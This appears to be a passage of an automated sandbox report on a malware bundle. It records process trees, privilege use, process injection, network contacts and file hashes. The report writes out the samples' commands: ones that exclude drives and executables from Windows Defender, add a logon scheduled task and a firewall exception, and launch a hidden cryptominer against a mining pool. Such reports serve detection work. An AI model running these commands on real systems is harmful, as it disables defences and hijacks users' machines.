N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1752 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1752 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1752 wrote to memory of 948 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1752 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1752 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1752 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1752 wrote to memory of 1036 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1752 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 1752 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 1752 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 1752 wrote to memory of 828 N/A C:\Users\Admin\AppData\Local\Temp\86523374.exe C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe
PID 828 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 828 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 828 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 828 wrote to memory of 1852 N/A C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe C:\Windows\System32\conhost.exe
PID 1852 wrote to memory of 1044 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1852 wrote to memory of 1044 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1852 wrote to memory of 1044 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1044 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 908 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 1080 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1852 wrote to memory of 1080 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1852 wrote to memory of 1080 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1080 wrote to memory of 740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1080 wrote to memory of 740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1080 wrote to memory of 740 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 948 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 948 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 948 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 948 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1044 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1044 wrote to memory of 1372 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1852 wrote to memory of 812 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1852 wrote to memory of 812 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1852 wrote to memory of 812 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 812 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 812 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 812 wrote to memory of 1556 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 752 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 752 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 752 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 752 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1556 wrote to memory of 1124 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1556 wrote to memory of 1124 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1556 wrote to memory of 1124 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1556 wrote to memory of 1124 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1124 wrote to memory of 1152 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1124 wrote to memory of 1152 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1124 wrote to memory of 1152 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1152 wrote to memory of 1828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1152 wrote to memory of 1828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1152 wrote to memory of 1828 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 1576 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1124 wrote to memory of 1576 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1124 wrote to memory of 1576 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1152 wrote to memory of 1704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1152 wrote to memory of 1704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1152 wrote to memory of 1704 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1124 wrote to memory of 1640 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 1124 wrote to memory of 1640 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 1124 wrote to memory of 1640 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Processes

C:\Users\Admin\AppData\Local\Temp\86523374.exe

"C:\Users\Admin\AppData\Local\Temp\86523374.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

"C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=GAMENAME --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1640 -s 124

Network

Country Destination Domain Proto
US 8.8.8.8:53 freegeoip.app udp
US 188.114.96.0:443 freegeoip.app tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp

Files

memory/1752-54-0x0000000000400000-0x000000000093B000-memory.dmp

memory/1752-55-0x0000000074DE1000-0x0000000074DE3000-memory.dmp

\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

\??\c:\users\admin\appdata\local\temp\klnr.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

memory/1852-66-0x00000000000E0000-0x0000000000301000-memory.dmp

memory/1852-67-0x000007FEF4E40000-0x000007FEF582C000-memory.dmp

memory/1036-68-0x000007FEF4E40000-0x000007FEF582C000-memory.dmp

memory/948-70-0x0000000001250000-0x0000000001251000-memory.dmp

memory/948-69-0x0000000073DF0000-0x000000007439B000-memory.dmp

memory/948-71-0x0000000073DF0000-0x000000007439B000-memory.dmp

memory/1036-72-0x00000000001E0000-0x000000000022A000-memory.dmp

memory/1852-73-0x000000001B242000-0x000000001B244000-memory.dmp

memory/1852-74-0x000000001B4E0000-0x000000001B700000-memory.dmp

memory/1852-75-0x000000001B244000-0x000000001B246000-memory.dmp

memory/1852-76-0x000000001B246000-0x000000001B247000-memory.dmp

memory/1036-77-0x000000001B150000-0x000000001B152000-memory.dmp

memory/1852-78-0x000000001B247000-0x000000001B248000-memory.dmp

memory/908-79-0x000007FEFB851000-0x000007FEFB853000-memory.dmp

memory/908-82-0x0000000002830000-0x0000000002832000-memory.dmp

memory/908-81-0x000007FEEEB90000-0x000007FEEF52D000-memory.dmp

memory/908-83-0x0000000002832000-0x0000000002834000-memory.dmp

memory/908-84-0x0000000002834000-0x0000000002837000-memory.dmp

memory/908-80-0x000007FEEC720000-0x000007FEED27D000-memory.dmp

memory/908-85-0x000000001B7A0000-0x000000001BA9F000-memory.dmp

memory/908-86-0x000000000283B000-0x000000000285A000-memory.dmp

\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\??\c:\users\admin\appdata\local\temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

memory/752-92-0x0000000073DF0000-0x000000007439B000-memory.dmp

memory/752-93-0x0000000002D90000-0x0000000002D91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\GTAHACK.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 364b3ef0a60761c536dee773743ae5a4
SHA1 3d2ec3d184b9d4438870e22f81da729a46db53bc
SHA256 c561ecd0e2448e975e0af302b5c2fa10b0d34ac2be3edb1950eedda7542269f2
SHA512 d9f3d06976b683a8023b94ea66fd51e2e225b6a4d7976cd17bff5e1e89b42b730f91ee07658273d4ea04aab8f86230ef1e1de3ac109cbbdbc0c3eb8be00adf5f

memory/1372-97-0x000007FEEB170000-0x000007FEEBCCD000-memory.dmp

memory/1372-98-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp

memory/1372-99-0x0000000002940000-0x0000000002942000-memory.dmp

memory/1372-100-0x000007FEEE1F0000-0x000007FEEEB8D000-memory.dmp

memory/1372-101-0x0000000002942000-0x0000000002944000-memory.dmp

memory/1372-102-0x0000000002944000-0x0000000002947000-memory.dmp

memory/1372-103-0x000000001B7E0000-0x000000001BADF000-memory.dmp

memory/1372-104-0x000000000294B000-0x000000000296A000-memory.dmp

C:\Windows\System32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

\Windows\System32\services64.exe

MD5 692461c05ba5cfb84d5fcb2bc56adafd
SHA1 c9df2056da3af20175f9ab1942058ef778c438b2
SHA256 1bd4f98c3c59ba62e79448064f48661c2acbc87d85ecd1556f68a3e23a3c2e2c
SHA512 68cef4b8123f1b0c24adbe6f71817b5fa2df3100d112813cfa73b6c0a148717b9f354409cccb941a42ae9e60493bb4dafc2c99318088be8b9416e8a30776bf46

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 42dc9eba47410301406c4e54ad8a114c
SHA1 ec2a755c3901e60fa183cfdb05d409431972d73a
SHA256 96821d8abac10c96ed171bc7158ff9b35a602b53f0da91dd13f0e7b2b7a85ad6
SHA512 a1e21aa88cbec4227b691e4c2bbc33b5e523bb2b210830e1469cde8aca0969b38981f138ada7f48115637d6392fc8c822dd997d9b72d7b45d7f79077900ac36e

memory/1124-110-0x0000000002132000-0x0000000002134000-memory.dmp

memory/1124-109-0x000007FEF4E40000-0x000007FEF582C000-memory.dmp

memory/1124-113-0x0000000002137000-0x0000000002138000-memory.dmp

memory/1124-112-0x0000000002136000-0x0000000002137000-memory.dmp

memory/1124-111-0x0000000002134000-0x0000000002136000-memory.dmp

\Windows\System32\Microsoft\Libs\sihost64.exe
